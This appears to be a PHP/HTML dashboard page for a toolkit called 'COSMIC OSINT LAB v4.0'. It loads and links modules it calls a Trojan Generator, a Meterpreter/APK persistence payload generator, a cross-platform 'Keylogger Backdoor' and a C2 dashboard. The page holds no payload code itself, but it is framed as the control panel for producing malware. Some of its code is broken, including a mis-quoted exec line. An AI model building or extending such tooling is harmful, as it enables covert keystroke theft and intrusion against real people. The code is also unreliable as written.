<?php
/**
 * COSMIC OSINT LAB - Unified Dashboard v4.0
 * All modules integrated – now with Keylogger Backdoor
 */

session_start();

require_once __DIR__ . '/includes/EnhancedModuleLoader.php';

$module_loader = EnhancedModuleLoader::getInstance();
$trojan_module_available = $module_loader->isAvailable();
$trojan_module_error = $module_loader->getError();

$advanced_payload_available = false;
$advanced_payload_module = null;
if (file_exists(__DIR__ . '/../system/modules/AdvancedPayloadModule.php')) {
    require_once __DIR__ . '/../system/modules/AdvancedPayloadModule.php';
    if (class_exists('AdvancedPayloadModule')) {
        $advanced_payload_available = true;
        $advanced_payload_module = new AdvancedPayloadModule();
    }
}

$payload_types = $module_loader->getPayloadTypes();
$encryption_methods = $module_loader->getEncryptionMethods();
$output_formats = $module_loader->getOutputFormats();

$redteam_module = null;
if (file_exists(__DIR__ . '/../includes/RedTeamOperations.php')) {
    require_once __DIR__ . '/../includes/RedTeamOperations.php';
    if (class_exists('RedTeamOperations')) {
        $redteam_module = new RedTeamOperations();
    }
}

// ------------------------------------------------------------
// MODULE CONFIGURATION – INCLUDING KEYLOGGER
// ------------------------------------------------------------
$modules = [
    'trojan' => [
        'name' => 'Trojan Generator',
        'icon' => '🏴‍☠️',
        'description' => 'Advanced payload generation & encryption',
        'status' => $trojan_module_available ? 'active' : 'inactive',
        'version' => $trojan_module_available ? '2.0' : '1.0 (Basic)',
        'endpoints' => ['generate' => 'trojan-dashboard.php', 'analyze' => 'trojan-dashboard.php', 'list' => 'trojan-dashboard.php']
    ],
    'redteam' => [
        'name' => 'Red Team Operations',
        'icon' => '🔴',
        'description' => 'Penetration testing & attack simulation',
        'status' => ($redteam_module !== null) ? 'active' : 'inactive',
        'version' => '1.0',
        'endpoints' => ['scan' => 'redteam-dashboard.php', 'exploit' => 'redteam-dashboard.php', 'report' => 'redteam-dashboard.php']
    ],
    'ai' => [
        'name' => 'AI Security Analyst',
        'icon' => '🤖',
        'description' => 'Machine learning threat analysis',
        'status' => file_exists(__DIR__ . '/ai-dashboard.php') ? 'active' : 'inactive',
        'version' => '1.0',
        'endpoints' => ['analyze' => 'ai-dashboard.php', 'predict' => 'ai-dashboard.php']
    ],
    'lab' => [
        'name' => 'Virtual Lab',
        'icon' => '🔬',
        'description' => 'Isolated testing environment',
        'status' => 'active',
        'version' => '1.0',
        'endpoints' => ['create' => 'lab.php', 'manage' => 'lab.php']
    ],
    'advanced' => [
        'name' => 'Advanced Payload Generator',
        'icon' => '🧬',
        'description' => 'Meterpreter, APK, persistence (v3.0)',
        'status' => $advanced_payload_available ? 'active' : 'inactive',
        'version' => '3.0',
        'endpoints' => ['generate' => 'trojan-dashboard.php?advanced=1', 'analyze' => 'trojan-dashboard.php?advanced=1&action=analyze', 'list' => 'trojan-dashboard.php?advanced=1&action=list']
    ],
    'keylogger' => [
        'name' => 'Keylogger Backdoor',
        'icon' => '⌨️',
        'description' => 'Cross‑platform keystroke logger (Win, Linux, macOS, Android)',
        'status' => $advanced_payload_available ? 'active' : 'inactive',
        'version' => '4.0',
        'endpoints' => ['generate' => 'trojan-dashboard.php?advanced=1&type=keylogger', 'analyze' => 'trojan-dashboard.php?advanced=1&action=analyze']
    ]
];

// ------------------------------------------------------------
// SYSTEM STATISTICS
// ------------------------------------------------------------
$payload_count = 0;
$payload_dir = dirname(__DIR__) . '/data/payloads';
if (is_dir($payload_dir)) $payload_count = count(glob($payload_dir . '/*'));

$advanced_payload_count = 0;
$advanced_dir = dirname(__DIR__) . '/data/advanced_payloads';
if ($advanced_payload_available && is_dir($advanced_dir)) $advanced_payload_count = count(glob($advanced_dir . '/*'));

$system_stats = [
    'total_payloads' => $payload_count,
    'advanced_payloads' => $advanced_payload_available ? $advanced_payload_count . ' generated' : 'module not active',
    'active_modules' => count(array_filter($modules, function($m) { return $m['status'] === 'active'; })),
    'disk_usage' => round(disk_free_space(__DIR__) / 1024 / 1024, 2) . ' MB free',
    'uptime' => @exec('cat /proc/uptime | awk '{print int($1/60)" minutes"}'') ?: 'Unknown',
    'last_scan' => date('Y-m-d H:i:s', filemtime(__DIR__ . '/../logs/security.log') ?: time())
];
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>🌀 COSMIC OSINT LAB v4.0 – Keylogger Integrated</title>
    <style> /* (CSS same as before – keep full cosmic style) */ 
        :root { --cosmic-purple:#8a2be2; --cosmic-blue:#00ffff; --cosmic-green:#00ff00; --cosmic-red:#ff0000; --cosmic-yellow:#ffff00; --cosmic-bg:#0a0a0a; --cosmic-card:rgba(20,20,40,0.9); }
        * { margin:0; padding:0; box-sizing:border-box; }
        body { font-family:'Courier New',monospace; background:var(--cosmic-bg); color:var(--cosmic-green); padding:20px; }
        .terminal-header { background:rgba(10,10,30,0.9); border:2px solid var(--cosmic-purple); border-radius:10px; padding:20px; margin-bottom:30px; position:relative; overflow:hidden; }
        .header-scanline { position:absolute; top:0; left:0; width:100%; height:2px; background:linear-gradient(90deg,transparent,var(--cosmic-blue),transparent); animation:scan 3s linear infinite; }
        @keyframes scan { 0%{transform:translateY(0);} 100%{transform:translateY(100vh);} }
        .system-status { display:grid; grid-template-columns:repeat(auto-fit,minmax(200px,1fr)); gap:15px; margin:20px 0; }
        .status-card { background:var(--cosmic-card); border:1px solid var(--cosmic-blue); border-radius:8px; padding:15px; transition:0.3s; }
        .status-card:hover { transform:translateY(-5px); border-color:var(--cosmic-purple); box-shadow:0 5px 20px rgba(138,43,226,0.3); }
        .modules-grid { display:grid; grid-template-columns:repeat(auto-fill,minmax(300px,1fr)); gap:20px; margin:30px 0; }
        .module-card { background:var(--cosmic-card); border:2px solid; border-radius:10px; padding:20px; transition:0.3s; cursor:pointer; position:relative; overflow:hidden; }
        .module-card::before { content:""; position:absolute; top:-50%; left:-50%; width:200%; height:200%; background:linear-gradient(45deg,transparent,rgba(255,255,255,0.1),transparent); transform:rotate(45deg); transition:0.5s; }
        .module-card:hover::before { left:100%; }
        .module-card.active { border-color:var(--cosmic-green); }
        .module-card.inactive { border-color:var(--cosmic-red); opacity:0.7; }
        .module-card.warning { border-color:var(--cosmic-yellow); }
        .module-icon { font-size:40px; margin-bottom:10px; }
        .module-status { position:absolute; top:10px; right:10px; padding:3px 8px; border-radius:12px; font-size:11px; font-weight:bold; }
        .status-active { background:rgba(0,255,0,0.2); color:var(--cosmic-green); }
        .status-inactive { background:rgba(255,0,0,0.2); color:var(--cosmic-red); }
        .status-warning { background:rgba(255,255,0,0.2); color:var(--cosmic-yellow); }
        .quick-actions { display:grid; grid-template-columns:repeat(auto-fit,minmax(150px,1fr)); gap:10px; margin:20px 0; }
        .action-btn { background:rgba(20,20,40,0.8); border:1px solid var(--cosmic-blue); color:var(--cosmic-blue); padding:10px; border-radius:6px; cursor:pointer; transition:0.3s; text-align:center; font-family:inherit; }
        .action-btn:hover { background:var(--cosmic-blue); color:#000; transform:scale(1.05); }
        .terminal-output { background:rgba(0,0,0,0.8); border:1px solid var(--cosmic-green); border-radius:8px; padding:15px; margin-top:20px; max-height:200px; overflow-y:auto; font-size:12px; }
        .log-entry { padding:5px 0; border-bottom:1px solid rgba(0,255,0,0.1); }
        .module-link { text-decoration:none; color:inherit; display:block; }
        .success-box { background:rgba(0,255,0,0.1); border:2px solid var(--cosmic-green); border-radius:10px; padding:20px; margin:20px 0; color:var(--cosmic-green); }
        .warning-box { background:rgba(255,255,0,0.1); border:2px solid var(--cosmic-yellow); border-radius:10px; padding:20px; margin:20px 0; color:var(--cosmic-yellow); }
        @media (max-width:768px){ .modules-grid{grid-template-columns:1fr;} }
    </style>
</head>
<body>
    <div class="terminal-header">
        <div class="header-scanline"></div>
        <h1 style="color:var(--cosmic-purple); text-align:center; font-size:2.5em;">🌀 COSMIC OSINT LAB v4.0</h1>
        <p style="text-align:center; color:var(--cosmic-blue); margin:10px 0;">Unified Security Operations Platform + Keylogger</p>
        <p style="text-align:center; color:#888;">Safe Module Integration</p>
    </div>

    <?php if ($advanced_payload_available): ?>
    <div class="success-box">
        <h3 style="margin-top:0;">✅ AdvancedPayloadModule v4.0 Active</h3>
        <p>Keylogger backdoors for Windows, Linux, macOS, Android now available.</p>
        <div style="display:flex; gap:20px; margin-top:15px; justify-content:center;">
            <a href="trojan-dashboard.php?advanced=1" style="color:var(--cosmic-green);">→ Advanced Payloads</a>
            <a href="trojan-dashboard.php?advanced=1&type=keylogger" style="color:var(--cosmic-blue);">→ Generate Keylogger</a>
        </div>
    </div>
    <?php endif; ?>

    <div class="system-status">
        <?php foreach ($system_stats as $k=>$v): ?>
        <div class="status-card">
            <div style="font-size:0.9em; color:var(--cosmic-blue); text-transform:uppercase;"><?php echo str_replace('_',' ',$k); ?></div>
            <div style="font-size:1.2em; font-weight:bold; margin-top:5px;"><?php echo htmlspecialchars($v); ?></div>
        </div>
        <?php endforeach; ?>
    </div>

    <div class="quick-actions">
        <button class="action-btn" onclick="window.location.href='trojan-dashboard.php'">🏴‍☠️ Generate Payload</button>
        <button class="action-btn" onclick="window.location.href='redteam-dashboard.php'">🔴 Red Team Ops</button>
        <button class="action-btn" onclick="window.location.href='ai-dashboard.php'">🤖 AI Analysis</button>
        <button class="action-btn" onclick="window.location.href='lab.php'">🔬 Virtual Lab</button>
        <button class="action-btn" onclick="window.location.href='trojan-dashboard.php?advanced=1'">🧬 Advanced</button>
        <button class="action-btn" onclick="window.location.href='trojan-dashboard.php?advanced=1&type=keylogger'">⌨️ Keylogger</button>
        <button class="action-btn" onclick="window.location.href='c2-dashboard.php'">🎮 C2 Dashboard</button>
        <button class="action-btn" onclick="window.location.href='c2-dashboard.php'">🎮 C2 Dashboard</button>
        <button class="action-btn" onclick="runSystemDiagnostic()">⚡ System Check</button>
        <button class="action-btn" onclick="window.location.href='quick.php'">🚀 Quick Nav</button>
    </div>

    <h2 style="margin:30px 0 15px 0; color:var(--cosmic-purple); border-bottom:1px solid var(--cosmic-blue); padding-bottom:10px;">🛠️ Integrated Modules</h2>

    <div class="modules-grid">
        <?php foreach ($modules as $key=>$module):
            $status = $module['status'];
            if ($key==='trojan' && $trojan_module_available) $status='active';
            elseif ($key==='trojan' && !$trojan_module_available) $status='warning';
        ?>
        <a href="<?php echo $module['endpoints']['generate']??'#'; ?>" class="module-link"
           onclick="return <?php echo $status==='active'?'true':'alert(\''.addslashes($module['name']).' module is '.$status.'\');false'; ?>">
            <div class="module-card <?php echo $status; ?>">
                <div class="module-icon"><?php echo $module['icon']; ?></div>
                <h3><?php echo $module['name']; ?></h3>
                <p style="color:#ccc; font-size:0.9em; margin:10px 0;"><?php echo $module['description']; ?></p>
                <div style="display:flex; justify-content:space-between; margin-top:15px;">
                    <span style="color:#888; font-size:0.8em;">v<?php echo $module['version']; ?></span>
                    <span class="module-status status-<?php echo $status; ?>"><?php echo strtoupper($status); ?></span>
                </div>
            </div>
        </a>
        <?php endforeach; ?>
    </div>

    <div class="terminal-output" id="systemLog">
        <div class="log-entry"><span style="color:#888;">[<?php echo date('H:i:s'); ?>]</span> <span style="color:var(--cosmic-green);">COSMIC OSINT v4.0 loaded</span></div>
        <div class="log-entry"><span style="color:#888;">[<?php echo date('H:i:s'); ?>]</span> <span style="color:var(--cosmic-blue);">Loaded <?php echo count($modules); ?> modules</span></div>
        <div class="log-entry"><span style="color:#888;">[<?php echo date('H:i:s'); ?>]</span> <span style="color:<?php echo $advanced_payload_available?'var(--cosmic-green)':'var(--cosmic-yellow)';?>;">Keylogger Module: <?php echo $advanced_payload_available?'ACTIVE v4.0':'NOT LOADED'; ?></span></div>
        <div class="log-entry"><span style="color:#888;">[<?php echo date('H:i:s'); ?>]</span> <span style="color:var(--cosmic-green);">Ready for operations</span></div>
    </div>

    <script>
        function addLog(m,t='info'){ const c={'info':'#0f0','warning':'#ff0','error':'#f00','debug':'#0ff'};
            const l=document.getElementById('systemLog'), e=document.createElement('div'); e.className='log-entry';
            e.innerHTML=`<span style="color:#888;">[${new Date().toLocaleTimeString()}]</span> <span style="color:${c[t]};"> ${m}</span>`;
            l.appendChild(e); l.scrollTop=l.scrollHeight; }
        function runSystemDiagnostic(){
            addLog('Running system diagnostic...','info');
            setTimeout(()=>{ let s=<?php echo $advanced_payload_available?'true':'false'; ?>; addLog(`${s?'✓':'⚠'} AdvancedPayloadModule: ${s?'v4.0':'not loaded'}`, s?'info':'warning'); },500);
            setTimeout(()=>addLog('✓ Red Team module: OK','info'),1000);
            setTimeout(()=>addLog('✓ AI module: OK','info'),1500);
            setTimeout(()=>addLog('✓ Keylogger payloads ready','debug'),2000);
            setTimeout(()=>addLog('✓ All systems operational','debug'),2500);
        }
        setInterval(()=>{ if(new Date().getSeconds()===0) addLog('Heartbeat: System normal','debug'); },1000);
    </script>
</body>
</html>
